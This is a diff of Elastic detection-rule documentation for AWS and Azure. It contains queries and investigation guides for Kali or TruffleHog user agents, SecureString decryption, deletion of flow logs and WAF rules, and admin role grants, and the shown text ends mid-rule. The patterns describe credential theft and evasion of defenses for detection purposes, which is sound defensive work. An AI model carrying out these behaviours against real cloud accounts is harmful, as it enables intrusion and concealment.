+*Rule authors*: + +* Elastic + +*Rule license*: Elastic License v2 + + +==== Investigation guide + + + +*Triage and Analysis* + + + +*Investigating AWS Suspicious User Agent Fingerprint* + + +AWS CloudTrail records the user agent string for API requests, which can reveal the OS distribution and client tooling. +Two high-signal patterns this rule covers are: + +- **Kali Linux fingerprint** — When the AWS CLI or Boto3 reports `distrib#kali`, the request likely came from a Kali + environment. Kali is widely used for penetration testing and adversarial tradecraft, so this is worth correlating with + identity, network context, and sensitivity of API actions. +- **TruffleHog** — TruffleHog identifies itself in the user agent when verifying whether recovered credentials are still + valid. Observing it against your account may indicate leaked keys are being tested, including through supply-chain or + secret-scanning abuse by a third party. + +This detection focuses on **successful** API activity. Evaluate who performed the action, what was accessed or modified, +and whether the source and tooling align with expectations. + + +*Possible investigation steps* + + +**Identify the actor** +- Review `aws.cloudtrail.user_identity.arn` and `aws.cloudtrail.user_identity.access_key_id` to determine which IAM + principal was used. +- Check whether this principal normally uses CLI/SDK clients and whether Kali or TruffleHog is ever expected for their role. + +**Review access patterns and actions** +- Examine API calls associated with the matched user agent for high-risk activity such as IAM changes, data access, + snapshot sharing, logging modification, or persistence-related actions. +- Look for sequences indicating initial access or expansion, such as `GetSessionToken`, `AssumeRole`, or privilege + escalation attempts. +- Determine whether the activity scope aligns with the principal’s intended permissions and business function. + +**Inspect source network and tooling context** +- Review `source.ip`, `source.geo` fields, and ASN to determine whether the request originated from an expected corporate + network, VPN, CI/CD egress, or known security testing infrastructure. +- Analyze `user_agent.original` to confirm which pattern matched (`distrib#kali` vs `TruffleHog`) and whether usage looks + interactive, scripted, or scanner-driven. +- Sudden shifts from console-based access to CLI from an offensive distribution, or first-time TruffleHog against the + account, may indicate credential compromise or unauthorized scanning. + +**Correlate with surrounding activity** +- Search for additional CloudTrail events tied to the same access key or session before and after this detection. +- Look for evidence of follow-on actions such as resource creation, configuration changes, or attempts to disable logging + and monitoring services. +- Assess whether the activity represents a single isolated request or part of a broader behavioral chain. + + +*False positive analysis* + + +- Internal red team or authorized assessments may produce Kali-based AWS CLI or SDK traffic. Confirm scope, timing, and + authorization. +- Organizational use of TruffleHog in CI to validate rotated keys or scan artifacts may generate this signal; restrict + exceptions to known roles, repositories, and egress IPs where possible. + + +*Response and remediation* + + +- If the activity is unauthorized, immediately revoke or rotate the affected access keys or invalidate the active + session. +- Review IAM permissions associated with the identity and reduce scope where possible to enforce least privilege. +- Investigate for additional indicators of compromise, including unusual role assumptions, new credential creation, or + data access from the same identity. +- Notify security operations and incident response teams if the activity aligns with known adversary behaviors or appears + part of a larger intrusion. +- Consider adding guardrails or conditional access controls (such as source IP restrictions or MFA enforcement) for + sensitive IAM principals. + + +*Additional information* + +- **https://github.com/aws-samples/aws-incident-response-playbooks/blob/c151b0dc091755fffd4d662a8f29e2f6794da52c/playbooks/[AWS IR Playbooks]** +- **https://github.com/aws-samples/aws-customer-playbook-framework/tree/a8c7b313636b406a375952ac00b2d68e89a991f2/docs[AWS Customer Playbook Framework]** +- **https://aws.amazon.com/premiumsupport/knowledge-center/security-best-practices/[AWS Knowledge Center – Security Best Practices]** + + +==== Rule query + + +[source, js] +---------------------------------- +any where data_stream.dataset == "aws.cloudtrail" + and event.outcome == "success" + and ( + ( + stringContains(user_agent.original, "distrib#kali") + or stringContains(user_agent.original, "+kali") + or stringContains(user_agent.original, "kali-amd64") + or stringContains(user_agent.original, "kali-arm64") + ) or ( + stringContains(user_agent.original, "TruffleHog") + or stringContains(user_agent.original, "trufflehog") + ) + ) + +---------------------------------- + +*Framework*: MITRE ATT&CK^TM^ + +* Tactic: +** Name: Initial Access +** ID: TA0001 +** Reference URL: https://attack.mitre.org/tactics/TA0001/ +* Technique: +** Name: Valid Accounts +** ID: T1078 +** Reference URL: https://attack.mitre.org/techniques/T1078/ +* Sub-technique: +** Name: Cloud Accounts +** ID: T1078.004 +** Reference URL: https://attack.mitre.org/techniques/T1078/004/ +* Tactic: +** Name: Defense Evasion +** ID: TA0005 +** Reference URL: https://attack.mitre.org/tactics/TA0005/ +* Technique: +** Name: Valid Accounts +** ID: T1078 +** Reference URL: https://attack.mitre.org/techniques/T1078/ +* Sub-technique: +** Name: Cloud Accounts +** ID: T1078.004 +** Reference URL: https://attack.mitre.org/techniques/T1078/004/ diff --git a/docs/detections/prebuilt-rules/downloadable-packages/8-19-32/prebuilt-rule-8-19-32-aws-systems-manager-securestring-parameter-request-with-decryption-flag.asciidoc b/docs/detections/prebuilt-rules/downloadable-packages/8-19-32/prebuilt-rule-8-19-32-aws-systems-manager-securestring-parameter-request-with-decryption-flag.asciidoc new file mode 100644 index 0000000000..caffd1f691 --- /dev/null +++ b/docs/detections/prebuilt-rules/downloadable-packages/8-19-32/prebuilt-rule-8-19-32-aws-systems-manager-securestring-parameter-request-with-decryption-flag.asciidoc @@ -0,0 +1,137 @@ +[[prebuilt-rule-8-19-32-aws-systems-manager-securestring-parameter-request-with-decryption-flag]] +=== AWS Systems Manager SecureString Parameter Request with Decryption Flag + +Detects the first occurrence of a user identity accessing AWS Systems Manager (SSM) SecureString parameters using the GetParameter or GetParameters API actions with credentials in the request parameters. This could indicate that the user is accessing sensitive information. This rule detects when a user accesses a SecureString parameter with the withDecryption parameter set to true. This is a New Terms rule that detects the first occurrence of an AWS identity accessing SecureString parameters with decryption. + +*Rule type*: new_terms + +*Rule indices*: + +* filebeat-* +* logs-aws.cloudtrail-* + +*Severity*: medium + +*Risk score*: 47 + +*Runs every*: 5m + +*Searches indices from*: now-6m ({ref}/common-options.html#date-math[Date Math format], see also <>) + +*Maximum alerts per execution*: 100 + +*References*: + +* https://docs.aws.amazon.com/vsts/latest/userguide/systemsmanager-getparameter.html +* https://docs.aws.amazon.com/systems-manager/latest/userguide/systems-manager-parameter-store.html + +*Tags*: + +* Domain: Cloud +* Platform: AWS +* Data Source: AWS CloudTrail +* Service: AWS SSM +* Tactic: Credential Access +* Rule Type: New Terms +* Resources: Investigation Guide + +*Version*: 10 + +*Rule authors*: + +* Elastic + +*Rule license*: Elastic License v2 + + +==== Investigation guide + + + +*Triage and analysis* + + + +*Investigating AWS Systems Manager SecureString Parameter Request with Decryption Flag* + + +This rule detects when an AWS resource accesses SecureString parameters within AWS Systems Manager (SSM) with the decryption flag set to true. SecureStrings are encrypted using a KMS key, and accessing these with decryption can indicate attempts to access sensitive data. + +Adversaries may target SecureStrings to retrieve sensitive information such as encryption keys, passwords, and other credentials that are stored securely. Accessing these parameters with decryption enabled is particularly concerning because it implies the adversary is attempting to bypass the encryption to obtain plain text values that can be immediately used or exfiltrated. This behavior might be part of a larger attack strategy aimed at escalating privileges or moving laterally within an environment to access protected data or critical infrastructure. + + +*Possible Investigation Steps* + + +- **Review the Access Event**: Identify the specific API call (`GetParameter` or `GetParameters`) that triggered the rule. Examine the `request_parameters` for `withDecryption` set to true and the name of the accessed parameter. +- **Verify User Identity and Access Context**: Check the `aws.cloudtrail.user_identity` details to understand who accessed the parameter and their role within the organization. This includes checking the ARN and access key ID to determine if the access was authorized. + - **User ID**: Review the `user.name` field to identify the specific user or role that initiated the API call. Note that the ARN associated may be an assumed role and may not directly correspond to a human user. +- **Contextualize with User Behavior**: Assess whether the access pattern fits the user’s normal behavior or job responsibilities. Investigate any out-of-pattern activities around the time of the event. +- **Analyze Geographic and IP Context**: Using the `source.ip` and `source.geo` information, verify if the request came from a trusted location or if there are any anomalies that suggest a compromised account. +- **Inspect Related CloudTrail Events**: Look for other related events in CloudTrail to see if there was unusual activity before or after this event, such as unusual login attempts, changes to permissions, or other API calls that could indicate broader unauthorized actions. + + +*False Positive Analysis* + + +- **Legitimate Administrative Use**: Verify if the decryption of SecureString parameters is a common practice for the user’s role, particularly if used in automation scripts or deployment processes like those involving Terraform or similar tools. +- **Authorized Access**: Ensure that the user or role has a legitimate reason to access the SecureString parameters and that the access is part of their expected job responsibilities. + + +*Response and Remediation* + + +- **Immediate Verification**: Contact the user or team responsible for the API call to verify their intent and authorization. +- **Review and Revise Permissions**: If the access was unauthorized, review the permissions assigned to the user or role to ensure they align with the principle of least privilege. +- **Audit Parameter Access Policies**: Ensure that policies governing access to SecureString parameters are strict and audit logs are enabled to track access with decryption. +- **Incident Response**: If suspicious activity is confirmed, follow through with your organization's incident response plan to mitigate any potential security issues. +- **Enhanced Monitoring and Alerting**: Strengthen monitoring rules to detect unusual accesses to SecureString parameters, especially those that involve decryption. + + +*Additional Information* + + +This rule focuses solely on SecureStrings in AWS Systems Manager (SSM) parameters. SecureStrings are encrypted using an AWS Key Management Service (KMS) key. When a user accesses a SecureString parameter, they can specify whether the parameter should be decrypted. If the user specifies that the parameter should be decrypted, the decrypted value is returned in the response. + + +==== Setup + + +This rule requires that AWS CloudTrail logs are ingested into the Elastic Stack. Ensure that the AWS integration is properly configured to collect AWS CloudTrail logs. This rule also requires event logging for AWS Systems Manager (SSM) API actions which can be enabled in CloudTrail's data events settings. + + +==== Rule query + + +[source, js] +---------------------------------- +data_stream.dataset: aws.cloudtrail + and event.provider: "ssm.amazonaws.com" + and event.action: (GetParameters or GetParameter) + and event.outcome: success + and aws.cloudtrail.flattened.request_parameters.withDecryption: true + and not source.address: ( + "cloudformation.amazonaws.com" or + "servicecatalog.amazonaws.com" + ) + and not user_agent.original: ( + *Fargate* or + *Terraform* + ) + +---------------------------------- + +*Framework*: MITRE ATT&CK^TM^ + +* Tactic: +** Name: Credential Access +** ID: TA0006 +** Reference URL: https://attack.mitre.org/tactics/TA0006/ +* Technique: +** Name: Credentials from Password Stores +** ID: T1555 +** Reference URL: https://attack.mitre.org/techniques/T1555/ +* Sub-technique: +** Name: Cloud Secrets Management Stores +** ID: T1555.006 +** Reference URL: https://attack.mitre.org/techniques/T1555/006/ diff --git a/docs/detections/prebuilt-rules/downloadable-packages/8-19-32/prebuilt-rule-8-19-32-aws-vpc-flow-logs-deletion.asciidoc b/docs/detections/prebuilt-rules/downloadable-packages/8-19-32/prebuilt-rule-8-19-32-aws-vpc-flow-logs-deletion.asciidoc new file mode 100644 index 0000000000..e519ec6bd4 --- /dev/null +++ b/docs/detections/prebuilt-rules/downloadable-packages/8-19-32/prebuilt-rule-8-19-32-aws-vpc-flow-logs-deletion.asciidoc @@ -0,0 +1,132 @@ +[[prebuilt-rule-8-19-32-aws-vpc-flow-logs-deletion]] +=== AWS VPC Flow Logs Deletion + +Identifies the deletion of one or more flow logs in AWS Elastic Compute Cloud (EC2). An adversary may delete flow logs in an attempt to evade defenses. + +*Rule type*: query + +*Rule indices*: + +* filebeat-* +* logs-aws.cloudtrail-* + +*Severity*: high + +*Risk score*: 73 + +*Runs every*: 5m + +*Searches indices from*: now-6m ({ref}/common-options.html#date-math[Date Math format], see also <>) + +*Maximum alerts per execution*: 100 + +*References*: + +* https://awscli.amazonaws.com/v2/documentation/api/latest/reference/ec2/delete-flow-logs.html +* https://docs.aws.amazon.com/AWSEC2/latest/APIReference/API_DeleteFlowLogs.html + +*Tags*: + +* Domain: Cloud +* Platform: AWS +* Data Source: AWS CloudTrail +* Service: AWS EC2 +* Tactic: Defense Evasion +* Rule Type: Custom Query (KQL) +* Resources: Investigation Guide + +*Version*: 214 + +*Rule authors*: + +* Elastic + +*Rule license*: Elastic License v2 + + +==== Investigation guide + + + +*Triage and analysis* + + + +*Investigating AWS VPC Flow Logs Deletion* + + +VPC Flow Logs is an AWS feature that enables you to capture information about the IP traffic going to and from network interfaces in your virtual private cloud (VPC). Flow log data can be published to Amazon CloudWatch Logs or Amazon S3. + +This rule identifies the deletion of VPC flow logs using the API `DeleteFlowLogs` action. Attackers can do this to cover their tracks and impact security monitoring that relies on this source. + + +*Possible investigation steps* + + +- Identify the user account that performed the action and whether it should perform this kind of action. +- Investigate other alerts associated with the user account during the past 48 hours. +- Contact the account and resource owners and confirm whether they are aware of this activity. +- Check if this operation was approved and performed according to the organization's change management policy. +- Considering the source IP address and geolocation of the user who issued the command: + - Do they look normal for the user? + - If the source is an EC2 IP address, is it associated with an EC2 instance in one of your accounts or is the source IP from an EC2 instance that's not under your control? + - If it is an authorized EC2 instance, is the activity associated with normal behavior for the instance role or roles? Are there any other alerts or signs of suspicious activity involving this instance? +- If you suspect the account has been compromised, scope potentially compromised assets by tracking servers, services, and data accessed by the account in the last 24 hours. + + +*False positive analysis* + + +- If this rule is noisy in your environment due to expected activity, consider adding exceptions — preferably with a combination of user and IP address conditions. +- Administrators may rotate these logs after a certain period as part of their retention policy or after importing them to a SIEM. + + +*Response and remediation* + + +- Initiate the incident response process based on the outcome of the triage. +- Disable or limit the account during the investigation and response. +- Identify the possible impact of the incident and prioritize accordingly; the following actions can help you gain context: + - Identify the account role in the cloud environment. + - Assess the criticality of affected services and servers. + - Work with your IT team to identify and minimize the impact on users. + - Identify if the attacker is moving laterally and compromising other accounts, servers, or services. + - Identify any regulatory or legal ramifications related to this activity. +- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords or delete API keys as needed to revoke the attacker's access to the environment. Work with your IT teams to minimize the impact on business operations during these actions. +- Check if unauthorized new users were created, remove unauthorized new accounts, and request password resets for other IAM users. +- Consider enabling multi-factor authentication for users. +- Review the permissions assigned to the implicated user to ensure that the least privilege principle is being followed. +- Implement security best practices https://aws.amazon.com/premiumsupport/knowledge-center/security-best-practices/[outlined] by AWS. +- Take the actions needed to return affected systems, data, or services to their normal operational levels. +- Identify the initial vector abused by the attacker and take action to prevent reinfection via the same vector. +- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR). + +==== Setup + + +The AWS Fleet integration, Filebeat module, or similarly structured data is required to be compatible with this rule. + +==== Rule query + + +[source, js] +---------------------------------- +data_stream.dataset:aws.cloudtrail and event.provider:ec2.amazonaws.com and event.action:DeleteFlowLogs and event.outcome:success + and not user_agent.original: (*Terraform* or *Pulumi*) + +---------------------------------- + +*Framework*: MITRE ATT&CK^TM^ + +* Tactic: +** Name: Defense Evasion +** ID: TA0005 +** Reference URL: https://attack.mitre.org/tactics/TA0005/ +* Technique: +** Name: Impair Defenses +** ID: T1562 +** Reference URL: https://attack.mitre.org/techniques/T1562/ +* Sub-technique: +** Name: Disable or Modify Cloud Logs +** ID: T1562.008 +** Reference URL: https://attack.mitre.org/techniques/T1562/008/ diff --git a/docs/detections/prebuilt-rules/downloadable-packages/8-19-32/prebuilt-rule-8-19-32-aws-waf-access-control-list-deletion.asciidoc b/docs/detections/prebuilt-rules/downloadable-packages/8-19-32/prebuilt-rule-8-19-32-aws-waf-access-control-list-deletion.asciidoc new file mode 100644 index 0000000000..6d616ae8af --- /dev/null +++ b/docs/detections/prebuilt-rules/downloadable-packages/8-19-32/prebuilt-rule-8-19-32-aws-waf-access-control-list-deletion.asciidoc @@ -0,0 +1,193 @@ +[[prebuilt-rule-8-19-32-aws-waf-access-control-list-deletion]] +=== AWS WAF Access Control List Deletion + +Identifies the deletion of an AWS Web Application Firewall (WAF) Web ACL. Web ACLs are the core enforcement objects in AWS WAF, defining which traffic is inspected, allowed, or blocked for protected applications. Deleting a Web ACL removes all associated rules, protections, and logging configurations. Adversaries who obtain sufficient privileges may delete a Web ACL to disable critical security controls, evade detection, or prepare for downstream attacks such as web-application compromise, data theft, or resource abuse. Because Web ACLs are rarely deleted outside of controlled maintenance or infrastructure updates, unexpected deletions may indicate potential defense evasion. + +*Rule type*: query + +*Rule indices*: + +* filebeat-* +* logs-aws.cloudtrail-* + +*Severity*: medium + +*Risk score*: 47 + +*Runs every*: 5m + +*Searches indices from*: now-6m ({ref}/common-options.html#date-math[Date Math format], see also <>) + +*Maximum alerts per execution*: 100 + +*References*: + +* https://docs.aws.amazon.com/waf/latest/APIReference/API_DeleteWebACL.html +* https://docs.aws.amazon.com/waf/latest/APIReference/API_wafRegional_DeleteWebACL.html + +*Tags*: + +* Domain: Cloud +* Platform: AWS +* Data Source: AWS CloudTrail +* Service: AWS WAF +* Tactic: Defense Evasion +* Rule Type: Custom Query (KQL) +* Resources: Investigation Guide + +*Version*: 213 + +*Rule authors*: + +* Elastic + +*Rule license*: Elastic License v2 + + +==== Investigation guide + + + +*Triage and analysis* + + + +*Investigating AWS WAF Access Control List Deletion* + + +AWS Web Application Firewall (WAF) protects applications by inspecting HTTP/S traffic and applying rule groups, +managed rule sets, and custom logic to block or allow requests. A Web ACL is the primary enforcement object that binds +these protections to CloudFront distributions, Application Load Balancers, API Gateway stages, and AppSync APIs. + +Deleting a Web ACL immediately removes all protections and logging associated with that application entry point. +Because this action can expose applications to direct exploitation, adversaries may delete Web ACLs to disable +defenses, evade detection, or prepare for lateral movement or data exfiltration. + +This rule detects successful `DeleteWebACL` events across WAF Classic, WAF Regional, and WAFv2 APIs. + + +*Possible investigation steps* + + +- **Identify the actor and access context** + - Review `aws.cloudtrail.user_identity.arn` and `access_key_id` for the identity that initiated deletion. + - Determine whether this principal normally manages WAF resources. + - Check if the call originated via IAM role assumption, federated identity, or long-lived IAM key. + +- **Assess the deleted ACL** + - Check `aws.cloudtrail.request_parameters` for: + - The Web ACL ID (`WebACLId`, `Id`, or ARN). + - The scope (REGIONAL vs. CLOUDFRONT). + - Associated resource ARNs that were protected. + - Determine which applications or APIs depended on this Web ACL. + - Evaluate the criticality and sensitivity of any exposed endpoints. + +- **Correlate with related security-affecting activity** + - Use CloudTrail to pivot on: + - The same identity (`user_identity.arn` or access key). + - The same application load balancer, CloudFront distribution, or API Gateway stage. + - Look for: + - Prior rule updates (`UpdateWebACL`, `DeleteRuleGroup`, etc.). + - IAM privilege escalation events. + - Changes to logging or monitoring (e.g., disabling WAF logging). + +- **Investigate request origin and tooling** + - Review `source.ip`, ASN, and geo-location for anomalies. + - Analyze `user_agent.original` to identify automation, custom scripts, CLI usage, or console access. + +- **Evaluate operational context** + - Determine whether the deletion aligns with: + - Scheduled maintenance. + - IaC-driven redeployments (Terraform, CDK, CloudFormation). + - Known migrations between WAF Classic and WAFv2. + - If deletion occurred outside expected time windows or without a corresponding change ticket, treat it as suspicious. + + +*False positive analysis* + + +- **Expected infrastructure lifecycle events** + - IaC pipelines may destroy and recreate Web ACLs as part of environment rotation or blue/green deployments. + - Confirm whether the deleting identity matches known automation roles. + +- **Planned refactoring or migrations** + - Organizations transitioning to WAFv2 or moving resources across regions may intentionally delete legacy ACLs. + +- **Testing and sandbox environments** + - Developers may frequently create and remove ACLs during experimentation. + - Tune the rule to suppress events from non-production accounts or specific tags. + +- **Automated cleanup** + - Certain CI/CD processes or teardown scripts remove WAF resources during ephemeral environment shutdowns. + +If any deletion is inconsistent with normal operational patterns or performed by an unexpected principal, treat it as a potential defense-evasion attempt. + + +*Response and remediation* + + +- **Containment** + - Immediately assess exposed applications. If feasible, apply temporary restrictive network controls (e.g., ALB security group tightening or CloudFront WAFv2 fallback rules). + - Revoke session tokens or access keys associated with suspicious actors. + +- **Restore protections** + - Recreate the deleted Web ACL using IaC definitions, backups, or previous configurations. + - Validate that logging and monitoring (WAF logs, CloudWatch alarms, SIEM ingestion) are correctly restored. + +- **Scope and impact analysis** + - Review CloudTrail for follow-on or preceding activity by the same actor: + - Rule modifications. + - IAM policy changes. + - Application configuration updates. + - API Gateway or ALB changes. + - Review application access logs for unusual requests following ACL removal. + +- **Hardening** + - Limit IAM permissions for `waf:DeleteWebACL`, `wafv2:DeleteWebACL`, and related actions to a small set of trusted roles. + - Enforce MFA for administrative access. + - Use AWS Config or Security Hub controls to detect unauthorized modifications to WAF resources. + +- **Post-incident improvements** + - Update change-management workflows to include required approvals for WAF modifications. + - Improve monitoring for other defense-evasion patterns such as disabling GuardDuty, CloudTrail, or logging. + + +*Additional information* + + +- **DeleteWebACL API (WAF Classic & Regional):** + https://docs.aws.amazon.com/waf/latest/APIReference/API_wafRegional_DeleteWebACL.html +- **DeleteWebACL API (WAFv2):** + https://docs.aws.amazon.com/waf/latest/APIReference/API_DeleteWebACL.html +- **https://github.com/aws-samples/aws-incident-response-playbooks/blob/c151b0dc091755fffd4d662a8f29e2f6794da52c/playbooks/[AWS IR Playbooks]** +- **https://github.com/aws-samples/aws-customer-playbook-framework/tree/a8c7b313636b406a375952ac00b2d68e89a991f2/docs[AWS Customer Playbook Framework]** +- **https://aws.amazon.com/premiumsupport/knowledge-center/security-best-practices/[AWS Knowledge Center – Security Best Practices]** + + +==== Rule query + + +[source, js] +---------------------------------- +data_stream.dataset: aws.cloudtrail + and event.provider: (waf.amazonaws.com or waf-regional.amazonaws.com or wafv2.amazonaws.com) + and event.action: DeleteWebACL + and event.outcome: success + and not user_agent.original: (*Terraform* or *Pulumi*) + +---------------------------------- + +*Framework*: MITRE ATT&CK^TM^ + +* Tactic: +** Name: Defense Evasion +** ID: TA0005 +** Reference URL: https://attack.mitre.org/tactics/TA0005/ +* Technique: +** Name: Impair Defenses +** ID: T1562 +** Reference URL: https://attack.mitre.org/techniques/T1562/ +* Sub-technique: +** Name: Disable or Modify Cloud Firewall +** ID: T1562.007 +** Reference URL: https://attack.mitre.org/techniques/T1562/007/ diff --git a/docs/detections/prebuilt-rules/downloadable-packages/8-19-32/prebuilt-rule-8-19-32-aws-waf-rule-or-rule-group-deletion.asciidoc b/docs/detections/prebuilt-rules/downloadable-packages/8-19-32/prebuilt-rule-8-19-32-aws-waf-rule-or-rule-group-deletion.asciidoc new file mode 100644 index 0000000000..a86e465a72 --- /dev/null +++ b/docs/detections/prebuilt-rules/downloadable-packages/8-19-32/prebuilt-rule-8-19-32-aws-waf-rule-or-rule-group-deletion.asciidoc @@ -0,0 +1,173 @@ +[[prebuilt-rule-8-19-32-aws-waf-rule-or-rule-group-deletion]] +=== AWS WAF Rule or Rule Group Deletion + +Identifies the deletion of an AWS Web Application Firewall (WAF) rule or rule group. WAF rules and rule groups enforce critical protections for web applications by filtering malicious HTTP requests, blocking known attack patterns, and enforcing access controls. Deleting these rules—even briefly—can expose applications to SQL injection, cross-site scripting, credential-stuffing bots, or targeted exploitation. Adversaries who have gained sufficient permissions may remove WAF protections as part of a broader defense evasion or impact strategy, often preceding data theft or direct application compromise. + +*Rule type*: query + +*Rule indices*: + +* filebeat-* +* logs-aws.cloudtrail-* + +*Severity*: medium + +*Risk score*: 47 + +*Runs every*: 5m + +*Searches indices from*: now-6m ({ref}/common-options.html#date-math[Date Math format], see also <>) + +*Maximum alerts per execution*: 100 + +*References*: + +* https://docs.aws.amazon.com/waf/latest/APIReference/API_waf_DeleteRule.html +* https://docs.aws.amazon.com/waf/latest/APIReference/API_waf_DeleteRuleGroup.html + +*Tags*: + +* Domain: Cloud +* Platform: AWS +* Data Source: AWS CloudTrail +* Service: AWS WAF +* Tactic: Defense Evasion +* Rule Type: Custom Query (KQL) +* Resources: Investigation Guide + +*Version*: 213 + +*Rule authors*: + +* Elastic + +*Rule license*: Elastic License v2 + + +==== Investigation guide + + + +*Triage and analysis* + + + +*Investigating AWS WAF Rule or Rule Group Deletion* + + +AWS WAF rules and rule groups define the security boundary for web applications by blocking malicious inputs, +enforcing rate-based protections, and applying managed or custom signatures. Deleting a rule or rule group immediately +weakens this boundary. Adversaries who obtain sufficient permissions may delete these protections to remove detection of malicious payloads prior to exploitation or erase defenses protecting high-value APIs. + +This rule detects successful `DeleteRule` or `DeleteRuleGroup` API calls in CloudTrail. + + +*Possible investigation steps* + + +**Identify the actor** +- Review `aws.cloudtrail.user_identity.arn` and `user_identity.access_key_id` to determine which principal performed the deletion. +- Determine whether the principal normally manages WAF resources or appears anomalous (new key, unused IAM role, unexpected federation source). + +**Inspect the request context** +- Review `source.address`, `source.geo` fields, and `user_agent.original` to determine if the request originated from a known enterprise IP range, a CI/CD runner or automation tool, an unfamiliar network, region, or browser/CLI pattern. + +**Understand what was deleted** +- Review `aws.cloudtrail.request_parameters` for `RuleId` or `RuleGroupId`, any referenced WebACLs using the rule, metadata indicating whether the deleted rule was part of production traffic control. + +**Correlate surrounding activity** +- Look for adjacent CloudTrail events: + - modifications to WebACLs (`UpdateWebACL`) + - creation of permissive rules (`CreateRule`, `PutRule`) after deletion + - IAM privilege escalation events + - unusual S3, API Gateway, or ALB access patterns immediately after the rule deletion +- Determine if deletion preceded or followed exploit attempts visible in application logs. + +**Establish operational context** +- Confirm whether the deletion aligns with a deployment pipeline, scheduled maintenance, rule tuning by security teams. If not, treat the event as potentially malicious. + +**Engage relevant owners** +- Contact application security or platform engineering teams to verify whether the rule or rule group deletion was authorized. + + +*False positive analysis* + + +- **Authorized deployment workflows** + Some organizations rebuild WAF rules programmatically during deployments. Validate expected CI/CD service roles and event timing. + +- **Automated rule regeneration** + Certain WAF-as-code approaches temporarily delete and recreate rules. Confirm if the event corresponds to an expected automation cycle. + +- **Security team testing** + Teams may temporarily disable or remove rules during testing of new signatures or rate controls. Verify scheduling and ownership. + +- **Non-production environments** + Development or staging accounts may routinely alter WAF rules. Tune the rule by account, environment tags, or namespaces to reduce noise. + + +*Response and remediation* + + +- **Contain the incident** + - Immediately verify whether the deletion was intentional. + - If unauthorized, revoke active access keys or disable implicated IAM roles/sessions. + +- **Reinstate protections** + - Restore the deleted rule or rule group from infrastructure-as-code definitions, backups, or documented configuration. + - Inspect associated WebACLs to ensure no additional rules were removed or modified. + +- **Investigate follow-on activity** + - Review application logs for suspicious requests following WAF rule removal. + - Investigate potential exploitation attempts (SQLi, XSS, API abuse, authentication bypass). + +- **Harden IAM and WAF governance** + - Limit WAF deletion operations to tightly controlled IAM roles. + - Enforce MFA and short session durations for privileged accounts. + - Consider guardrails using AWS Config or SCPs to prevent deletion of production WAF rules. + +- **Post-incident improvements** + - Update runbooks to track planned WAF changes. + - Strengthen CI/CD guardrails to prevent unauthorized rule manipulation. + - Enhance alerting for other high-risk WAF configuration changes. + + +*Additional information* + + +- **DeleteRule API (WAF Classic & Regional)** + https://docs.aws.amazon.com/waf/latest/APIReference/API_waf_DeleteRule.html +- **DeleteRuleGroup API (WAFv2)** + https://docs.aws.amazon.com/waf/latest/APIReference/API_waf_DeleteRuleGroup.html +- **https://github.com/aws-samples/aws-incident-response-playbooks/blob/c151b0dc091755fffd4d662a8f29e2f6794da52c/playbooks/[AWS IR Playbooks]** +- **https://github.com/aws-samples/aws-customer-playbook-framework/tree/a8c7b313636b406a375952ac00b2d68e89a991f2/docs[AWS Customer Playbook Framework]** +- **https://aws.amazon.com/premiumsupport/knowledge-center/security-best-practices/[AWS Knowledge Center – Security Best Practices]** + + +==== Rule query + + +[source, js] +---------------------------------- +data_stream.dataset: aws.cloudtrail + and event.provider: (waf.amazonaws.com or waf-regional.amazonaws.com or wafv2.amazonaws.com) + and event.action: (DeleteRule or DeleteRuleGroup) + and event.outcome: success + and not user_agent.original: (*Terraform* or *Pulumi*) + +---------------------------------- + +*Framework*: MITRE ATT&CK^TM^ + +* Tactic: +** Name: Defense Evasion +** ID: TA0005 +** Reference URL: https://attack.mitre.org/tactics/TA0005/ +* Technique: +** Name: Impair Defenses +** ID: T1562 +** Reference URL: https://attack.mitre.org/techniques/T1562/ +* Sub-technique: +** Name: Disable or Modify Cloud Firewall +** ID: T1562.007 +** Reference URL: https://attack.mitre.org/techniques/T1562/007/ diff --git a/docs/detections/prebuilt-rules/downloadable-packages/8-19-32/prebuilt-rule-8-19-32-azure-rbac-built-in-administrator-roles-assigned.asciidoc b/docs/detections/prebuilt-rules/downloadable-packages/8-19-32/prebuilt-rule-8-19-32-azure-rbac-built-in-administrator-roles-assigned.asciidoc new file mode 100644 index 0000000000..245d3b02ba --- /dev/null +++ b/docs/detections/prebuilt-rules/downloadable-packages/8-19-32/prebuilt-rule-8-19-32-azure-rbac-built-in-administrator-roles-assigned.asciidoc @@ -0,0 +1,161 @@ +[[prebuilt-rule-8-19-32-azure-rbac-built-in-administrator-roles-assigned]] +=== Azure RBAC Built-In Administrator Roles Assigned + +Identifies when a user is assigned a built-in administrator role in Azure RBAC (Role-Based Access Control). These roles provide significant privileges and can be abused by attackers for lateral movement, persistence, or privilege escalation. The privileged built-in administrator roles include Owner, Contributor, User Access Administrator, Azure File Sync Administrator, Reservations Administrator, and Role Based Access Control Administrator. + +*Rule type*: query + +*Rule indices*: + +* filebeat-* +* logs-azure.activitylogs-* + +*Severity*: high + +*Risk score*: 73 + +*Runs every*: 5m + +*Searches indices from*: now-9m ({ref}/common-options.html#date-math[Date Math format], see also <>) + +*Maximum alerts per execution*: 100 + +*References*: + +* https://learn.microsoft.com/en-us/azure/role-based-access-control/built-in-roles +* https://orca.security/resources/research-pod/azure-identity-access-management-iam-active-directory-ad/ +* https://www.microsoft.com/en-us/security/blog/2025/08/27/storm-0501s-evolving-techniques-lead-to-cloud-based-ransomware/ + +*Tags*: + +* Domain: Cloud +* Domain: Identity +* Data Source: Azure +* Data Source: Azure Activity Logs +* Platform: Azure +* Rule Type: Custom Query (KQL) +* Use Case: Identity and Access Audit +* Tactic: Privilege Escalation +* Tactic: Persistence +* Resources: Investigation Guide + +*Version*: 4 + +*Rule authors*: + +* Elastic + +*Rule license*: Elastic License v2 + + +==== Investigation guide + + + +*Triage and analysis* + + + +*Investigating Azure RBAC Built-In Administrator Roles Assigned* + + +This rule identifies when a user is assigned a built-in administrator role in Azure RBAC (Role-Based Access Control). These roles provide significant privileges and can be abused by attackers for lateral movement, persistence, or privilege escalation. The privileged built-in administrator roles include Owner, Contributor, User Access Administrator, Azure File Sync Administrator, Reservations Administrator, and Role Based Access Control Administrator. Assignment can be done via the Azure portal, Azure CLI, PowerShell, or through API calls. Monitoring these assignments helps detect potential unauthorized privilege escalations. + + +*Privileged Built-In Administrator Roles* + +- Contributor: b24988ac-6180-42a0-ab88-20f7382dd24c +- Owner: 8e3af657-a8ff-443c-a75c-2fe8c4bcb635 +- Azure File Sync Administrator: 92b92042-07d9-4307-87f7-36a593fc5850 +- Reservations 